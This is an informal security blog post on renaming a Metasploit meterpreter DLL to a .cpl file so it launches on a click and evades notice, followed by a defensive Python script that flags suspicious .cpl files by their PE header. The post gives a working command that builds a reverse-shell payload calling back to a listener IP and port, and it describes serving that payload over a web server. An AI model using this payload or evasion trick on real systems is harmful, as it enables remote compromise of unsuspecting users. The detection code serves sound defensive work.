I was looking around at folder tricks and how they could be re-purposed for evil; gotta sharpen my mind to be super nasty (honey-badger-like, if you will). Anyway, I was on this site
I thought, hmm, what's this .cpl file type business ... so I search my computer for one listed ...
It has the same icon as a .DLL, I wonder if it behaves like a .DLL
So I jump on my Linux box and, using g0tm1lk's MSF-Venom Payload Creator, create a meterpreter dll that will, as most of you can probably see, when executed connect back to 192.168.0.180 on port 4433
./mpc.sh dll 192.168.0.180 4433 msf reverse staged tcp
As you can see, mpc even shows you how to make the payload accessible over the network via a simple Python web server, so ... do that.
rename it from
You now have an executable meterpreter payload that will launch from a click. What's cool about this is that it IS a .dll, but you can't double-click and launch it as a .dll, yet a .cpl file you can. This might only be useful for evasion, in terms of it's an executable file extension that goes overlooked ... and I'll be looking for more
I didn't know about this technique until I was playing around
Some other information on .cpl abuse
The TrendMicro piece is pretty good
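
For defenders, the observation above (a .cpl is a DLL that launches from a click, under an extension that goes overlooked) translates into a file-triage check that classifies by PE header instead of extension. This is an added example, not code from the original post or from any tool it mentions. The paths, sample bytes, `SYSTEM_DIRS` allowlist and function names are assumptions constructed for illustration, and the `CPlApplet` test is a byte-string heuristic, not a full export-table parse.

```python
import struct
from pathlib import PureWindowsPath

IMAGE_FILE_DLL = 0x2000  # COFF Characteristics flag: image is a DLL
# Assumed allowlist: directories where stock Control Panel applets live.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def pe_is_dll(data: bytes) -> bool:
    """Decide from the PE/COFF header, not the extension, whether this is a DLL."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of "PE\0\0"
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    (flags,) = struct.unpack_from("<H", data, e_lfanew + 22)  # Characteristics
    return bool(flags & IMAGE_FILE_DLL)

def triage_cpl(path: str, data: bytes) -> list[str]:
    """Return reasons a .cpl file deserves a closer look (empty list = nothing flagged)."""
    p = PureWindowsPath(path)
    if p.suffix.lower() != ".cpl" or not pe_is_dll(data):
        return []
    reasons = []
    if str(p.parent).lower() not in SYSTEM_DIRS:
        reasons.append("loadable .cpl outside the system directories")
    # Heuristic: export names are NUL-terminated ASCII, and a genuine
    # Control Panel applet exports CPlApplet.
    if b"CPlApplet\0" not in data:
        reasons.append("no CPlApplet export name found")
    return reasons

def constructed_pe(flags: int, body: bytes = b"") -> bytes:
    """Constructed sample: just enough DOS + COFF header for pe_is_dll()."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 0, flags)
    return dos + b"PE\0\0" + coff + body

SAMPLES = {  # constructed paths and contents, for illustration only
    r"C:\Windows\System32\timedate.cpl": constructed_pe(0x2022, b"CPlApplet\0"),
    r"C:\Users\alice\Downloads\invoice.cpl": constructed_pe(0x2022),
    r"C:\Users\alice\Downloads\notes.cpl": b"plain text, not a PE",
}

if __name__ == "__main__":
    for path, data in SAMPLES.items():
        print(path, "->", triage_cpl(path, data) or "ok")
```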